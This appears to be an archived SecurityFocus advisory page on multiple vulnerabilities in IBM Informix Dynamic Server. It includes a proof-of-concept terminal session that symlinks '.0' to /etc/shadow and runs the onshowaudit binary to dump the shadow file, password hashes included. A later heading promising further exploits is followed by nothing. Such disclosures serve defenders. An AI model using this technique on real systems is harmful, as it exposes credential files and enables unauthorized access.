IBM Informix Dynamic Server/Informix Extended Parallel Server Multiple Vulnerabilities

The following example has been supplied, as a proof of concept for the third vulnerability:
[informix@dimoni tmp]$ ls -alc /etc/shadow
-r-------- 1 root root 1020 Aug 10 01:59 /etc/shadow
[informix@dimoni tmp]$ ln -s /etc/shadow .0
informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit

wait for the output
....
aaa:!!:11635:0:99999:7:::
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::
bbb:!!:11636:0:99999:7:::
cccc:!!:11636:0:99999:7:::
ddddd:!!:11647:0:99999:7:::
aaaaaa:!!:11806:0:99999:7:::
wwwwww:!!:11833:0:99999:7:::
zzz:!!:12027:0:99999:7:::
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::

Program Over.

The following proof of concept exploits have been supplied:


 

Privacy Statement
Copyright 2010, SecurityFocus